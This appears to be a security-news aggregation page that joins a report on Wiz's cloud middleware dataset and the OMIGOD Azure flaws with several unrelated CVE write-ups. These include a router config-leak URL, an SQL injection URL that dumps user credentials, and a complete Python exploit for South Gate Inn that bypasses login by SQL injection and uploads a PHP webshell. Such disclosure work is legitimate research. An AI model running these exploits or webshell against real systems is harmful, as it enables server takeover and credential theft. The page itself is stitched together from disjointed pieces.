New open source database details the software that cloud service providers typically silently install on enterprises' virtual machines — often unbeknownst to customers.

RSA CONFERENCE 2022 – If cloud services weren't complicated enough for the typical business today to properly configure and secure, there's also a lesser-known layer of middleware that cloud providers run that can harbor hidden security flaws.

Researchers from Wiz.io last week at RSA Conference in San Francisco unveiled an open source, cloud middleware database on GitHub that details the specific middleware agents that Amazon Web Services (AWS), Google, and Microsoft install on their cloud customers' virtual machines. The goal is to shine a light on this traditionally hidden proprietary software layer and its potential software flaws that can leave a cloud customer unknowingly at risk of attack.

Cloud providers often silently install these "secret agent" middleware programs on their customers' virtual machines, and with the highest privileges, as a "bridge" between their cloud services and their customers' VMs. The Cloud Middleware Dataset database project aims to provide cloud customers insight into this layer of software they rarely know exists on their virtual machines in a cloud service — and the potential security risks associated with it.

"These agents are adding an additional attack surface and cloud customers don't know about those agents ...; most are installed silently. If they come pre-installed, they have no idea" either, Shir Tamari, head of research at Wiz.io, told Dark Reading in an interview at the RSA Conference last week.

The most high-profile example of cloud middleware gone wrong was the discovery of major flaws in Microsoft Azure's Open Management Infrastructure (OMI) agent software last fall. Tamari and his fellow researchers unearthed major remote execution and privilege escalation vulns in Azure, with a collection of flaws they dubbed OMIGOD. OMI runs on many Linux VMs in Azure to provide configuration management functions for cloud customers.

Of the four OMIGOD vulnerabilities (CVE-2021-38647, CVE-2021-38648, CVE-2021-38645, and CVE-2021-38649), the most painful one was CVE-2021-38647, which could allow an attacker to gain root on a VM with a single packet, merely by stripping the authentication header. The problem: A default configuration for OMI was exposed the HTTPS management port on the public Internet. Microsoft provided auto-updates for Azure to address the flaws, after initially releasing patches that most Azure customers had no idea applied to them since they weren't aware of OMI.

"There was confusion over how to handle this middleware" patching, Tamari said.

The Cloud Middleware Dataset so far includes several agents used in Azure in addition to OMI, such as Microsoft Azure Guest Agent (WALinuxAgent), which is preconfigured in all Azure Linux images and has root privileges. WALinuxAgent's listing in the database notes that the agent previously contained an information disclosure vulnerability, CVE-2019-0804. If exploited, it could allow an attacker to access memory in the kernel from a user process.

Other Azure middleware detailed in the database are Operations Management Suite, dependency agent, pipelines agent, and RD Agent service, each of which is employed in various Azure services.

AWS, meanwhile, has four such middleware agents listed in the dataset, AWS Systems Manager Agent (SSM Agent), AWS PV Drivers, AWS ECS container agent, and AWS EC2 Hibernation Initialization Agent. A local privilege escalation flaw CVE-2022-29527 was found this year in SSM Agent that an attacker could use to gain root access. That agent comes preconfigured in Windows, Linux, and macOS VM images.

Google Cloud runs Accounts Daemon, OSConfig agent, and a guest agent in its cloud services, all of which are Linux-based. OSConfig and guest also run on Windows. Accounts Daemon, which works in Google's OS Login service, previously was patched for a local privilege escalation flaw, CVE-2020-8933, that would have given root access. OSConfig, which is built into GCP VM images, also had a local privilege escalation vuln in 2020 that Google later fixed.

**What to Ask About Cloud Middleware**

So, how can organizations pinpoint these "secret agents," as Wiz researchers refer to them?

In an interview with Dark Reading at RSAC, Wiz co-founder and CTO Ami Luttwak said organizations should ask questions of cloud providers to get a clear view of what their software environment looks like: "Whose middleware is it \[and\] how do you know if it's running on your environment" and does the software contain vulnerabilities, and how are updates and patches handled?

"This is a different attack surface. It's a gray area," he said. "It needs transparency and a clear process for updates for agents, VMs."

Beware the 'Secret Agent' Cloud Middleware

A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN579 X3 M79X3.V5030.180719 allows attackers to obtain sensitive router information via a crafted POST request.

**0x01 Vulnerability description**

An issue was discovered in Wavlink WN579X3,Firmware package version M79X3.V5030.180719,affecting /cgi-bin/ExportAllSettings.sh where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.

**0x02 Affected version****0x03 Vulnerability**

When viewing the /cgi-bin/ExportAllSettings.sh file, it was not properly authorized by the system.

**0x04 PoC verification**

Directly construct the url link as:

    http://xxx.xxx.xxx.xxx/cgi-bin/ExportAllSettings.sh
    

You can download the configuration file, the configuration file contains the account password

**0x05 Acknowledgement**

Penwei.Huang

CVE-2022-31847: CVE_Request/WAVLINK WN579 X3__Sensitive information leakage.md at main · pghuanghui/CVE_Request

'Mobaoku-Auction&Flea Market' App for iOS versions prior to 5.5.16 improperly verifies server certificates, which may allow an attacker to eavesdrop on an encrypted communication via a man-in-the-middle attack.

Published:2022/05/27  Last Updated:2022/05/27

**Overview**

Mobaoku-Auction & Flea Market App for iOS is vulnerable to improper server certificate verification.

**Products Affected**

*   Mobaoku-Auction & Flea Market App for iOS versions prior to 5.5.16

**Description**

Mobaoku-Auction & Flea Market App for iOS provided by DeNA Co., Ltd. is vulnerable to improper server certificate verification (CWE-295).

**Impact**

A man-in-the-middle attack may allow an attacker to eavesdrop on an encrypted communication.

**Solution**

**Update the application**  
Update the application to the latest version according to the information provided by the developer.  
The developer released the following version that fixes the vulnerability on February 21, 2022:

*   Mobaoku-Auction & Flea Market App for iOS version 5.5.16

**Vendor Status**

Vendor

Status

Last Update

Vendor Notes

DeNA Co., Ltd.

Vulnerable

2022/05/27

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

CVSS v3 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Attack Vector(AV)

Physical (P)

Local (L)

Adjacent (A)

Network (N)

Attack Complexity(AC)

High (H)

Low (L)

Privileges Required(PR)

High (H)

Low (L)

None (N)

User Interaction(UI)

Required (R)

None (N)

Scope(S)

Unchanged (U)

Changed (C)

Confidentiality Impact(C)

None (N)

Low (L)

High (H)

Integrity Impact(I)

None (N)

Low (L)

High (H)

Availability Impact(A)

None (N)

Low (L)

High (H)

CVSS v2 AV:N/AC:H/Au:N/C:P/I:P/A:N

Access Vector(AV)

Local (L)

Adjacent Network (A)

Network (N)

Access Complexity(AC)

High (H)

Medium (M)

Low (L)

Authentication(Au)

Multiple (M)

Single (S)

None (N)

Confidentiality Impact(C)

None (N)

Partial (P)

Complete (C)

Integrity Impact(I)

None (N)

Partial (P)

Complete (C)

Availability Impact(A)

None (N)

Partial (P)

Complete (C)

**Comment**

This analysis assumes a man-in-the-middle attack being conducted by an attacker that places a malicious wireless LAN access point.

**Credit**

Okazawa Yoshihiro reported this vulnerability to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

**Other Information**

CVE-2022-29482: Mobaoku-Auction & Flea Market App for iOS vulnerable to improper server certificate verification

Online Fire Reporting System v1.0 was discovered to contain a SQL injection vulnerability via the GET parameter in /report/list.php.

**May 21, 2022**

Product

Online Fire Reporting System

Product Link

Link

Vulnerability

SQL Injection

Severity

Critical

**Overview**

SQL Injection is an attack where an attacker can maliciously inject their own code into a SQL query. This can lead to the attacker being able to dump arbitary data from the database.

The vulnerability is a result of using non-parameterised queries when fetching search results on the report search page inside the /report/list.php file.

    <?php
    if(isset($_GET['search'])):
    $i = 1;
    $qry = $conn->query("SELECT * from `request_list` where (fullname LIKE '%{$_GET['search']}%' or contact LIKE '%{$_GET['search']}%' or code LIKE '%{$_GET['search']}%') order by abs(unix_timestamp(date_created)) desc ");
    while($row = $qry->fetch_assoc()):
    ?>
    

As the GET parameters provided by the user are not sanitised or parameterised, a user can inject their own query and end their query in a semicolon and a SQL comment, removing the end of the query and being able to control what data is returned.

This can be used to exfiltrate the username and passwords of all users on the platform. As the passwords are stored as unsalted MD5 hashes, these passwords would be very easy to crack through brute force.

POC Url:

    http://localhost/?p=report/list&search=a%27)%20UNION%20SELECT%20null,%20null,username,password,%20null,%20null,%20null,%20null,%20null,%20null%20FROM%20users;%20--%20-
    

The application should use parameterised queries to ensure that any user input is properly escaped.

CVE-2022-31415: SQL Injection - Online Fire Reporting System - ResearchInTheBin

The South Gate Inn Online Reservation System v1.0 contains an SQL injection vulnerability that can be chained with a malicious PHP file upload, which is caused by improper file handling in the editImg function. This vulnerability leads to remote code execution.

\# Exploit Title: South Gate Inn Online Reservation System v1.0 - Remote Code Execution \# Date: 21.09.2021 \# Exploit Author: Janik Wehrli \# Vendor Homepage: https://www.sourcecodester.com/php/10584/south-gate-inn-online-reservation-system.html \# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/southgateinn.zip \# Version: 1.0 \# Tested On: Ubuntu 18.04,Windows 10 + XAMPP 7.4 #Description: \# The South Gate Inn Online Reservation System suffers from an SQLi authentication Bypass which leads to Admin access on the application. \# From there it's possible to upload a malicious PHP file to the server by changing a Room Image (getimagesize PHP function bypass). \# Both SQL queries and file validations are not handled properly, which leaves the Webserver in a vulnerable state. \# The impact of this vulnerability is the compromise of the Webserver. import requests, sys from colorama import Fore, Back, Style requests.packages.urllib3.disable\_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) F \= \[Fore.RESET, Fore.BLACK, Fore.RED, Fore.GREEN, Fore.YELLOW, Fore.BLUE, Fore.MAGENTA, Fore.CYAN, Fore.WHITE\] B \= \[Back.RESET, Back.BLACK, Back.RED, Back.GREEN, Back.YELLOW, Back.BLUE, Back.MAGENTA, Back.CYAN, Back.WHITE\] S \= \[Style.RESET\_ALL, Style.DIM, Style.NORMAL, Style.BRIGHT\] info \= S\[3\] + F\[5\] + '\[' + S\[0\] + S\[3\] + '-' + S\[3\] + F\[5\] + '\]' + S\[0\] + ' ' err \= S\[3\] + F\[2\] + '\[' + S\[0\] + S\[3\] + '!' + S\[3\] + F\[2\] + '\]' + S\[0\] + ' ' ok \= S\[3\] + F\[3\] + '\[' + S\[0\] + S\[3\] + '+' + S\[3\] + F\[3\] + '\]' + S\[0\] + ' ' ASCII\_ART \= """ \_.---.\_ /\\\\ ./' "--\`\\// ./ o \\ /./\\ )\_\_\_\_\_\_ \\\_\_ \\ ./ / /\\ \\ | \\ \\ \\ \\ / / \\ \\ | |\\ \\ \\7 " " " " SouthGateInn RCE v1.0 Janik Wehrli """ \# Set variables print(ASCII\_ART) SERVER\_URL \= str( input("Type in your SouthGateInn System v1.0 Location e.g http://192.168.20.20/southgateinn/SouthGateInn: \\n")) LOGIN\_URL \= SERVER\_URL + '/admin/login.php' UPLOAD\_URL \= SERVER\_URL + "/admin/mod\_room/controller.php?action=editimage" PWN\_URL \= SERVER\_URL + "/admin/mod\_room/rooms/" USERNAME \= "'OR 1=1#" PASSWORD \= "PWNED" WEBSHELL\_NAME \= "pwn.php" \# Uncomment the bottom line to run the exploit through a proxy such as burp \# proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} \# Create a simple web session with python s \= requests.Session() \# GET request to webserver - Start a session & retrieve a session cookie get\_session \= s.get(LOGIN\_URL, verify\=False) \# Check connection to website & print session cookie to terminal OR die if get\_session.status\_code \== 200: print(ok + 'Successfully connected to SouthGateInn System v1.0 server & created session.') print(info + "Session Cookie: " + get\_session.headers\['Set-Cookie'\]) else: print(err + 'Cannot connect to the server and create a web session.') sys.exit(\-1) \# 1. Bypass Login to get Admin access \# POST data to bypass Authentication via SQL Injection login\_data \= {'username': USERNAME, 'password': PASSWORD, 'login': ''} print( info + "Attempting to Login to SouthGateInn System v1.0 the following payload: " + "username:" + USERNAME + ":" + "password:" + PASSWORD) \# auth = s.post(url=LOGIN\_URL, data=login\_data, verify=False, proxies=proxies) auth \= s.post(url\=LOGIN\_URL, data\=login\_data, verify\=False, allow\_redirects\=True) if auth.status\_code \== 200: print(ok, "Login Success") else: print(err, "Something Went Wrong") \# 2. Upload simple PHP Webshell to get command execution \# Content-Disposition: form-data; name="image"; filename="pwn.php" \# Content-Type: application/octet-stream webshell \= { 'image': ( WEBSHELL\_NAME, 'GIF89a <?php echo shell\_exec($\_GET\["cmd"\]);?>', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } print(info + "Upload Webshell via insecure verification of images (getimagesize()) add GIF Magic Bytes") print(info + "Send Post malicious POST Request to the Server") upload\_webshell \= s.post(url\=UPLOAD\_URL, files\=webshell, verify\=False) if "window.location='index.php'" in upload\_webshell.text: print(ok, "Success") print(ok, "Your Webshell is located under: " + PWN\_URL + WEBSHELL\_NAME) print(ok, "Execute Commands via the GET Parameter 'cmd' for e.g " + PWN\_URL + WEBSHELL\_NAME + "?cmd=whoami") else: print(err, "Something Went Wrong")

CVE-2021-41662: 0dayHunt/SouthGateInn_RCE.py at main · janikwehrli1/0dayHunt

A Server-Side Request Forgery (SSRF) vulnerability in IPS Community Suite before 4.6.2 allows remote authenticated users to request arbitrary URLs or trigger deserialization via phar protocol when generating class names dynamically. In some cases an exploitation is possible by an unauthenticated user.

CVE-2021-40604: 4.6.2

The Simple Membership WordPress plugin before 4.1.1 does not properly sanitise and escape parameters before outputting them back in AJAX actions, leading to Reflected Cross-Site Scripting

CVE-2022-1724

The WP SVG Icons WordPress plugin through 3.2.3 does not properly validate uploaded custom icon packs, allowing an high privileged user like an admin to upload a zip file containing malicious php code, leading to remote code execution.

CVE-2022-0863

The Google Places Reviews WordPress plugin before 2.0.0 does not properly escape its Google API key setting, which is reflected on the site's administration panel. A malicious administrator could abuse this bug, in a multisite WordPress configuration, to trick super-administrators into viewing the booby-trapped payload and taking over their account.

CVE-2022-1772

The iQ Block Country WordPress plugin through 1.2.13 does not properly checks HTTP headers in order to validate the origin IP address, allowing threat actors to bypass it's block feature by spoofing the headers.

Tag

#perl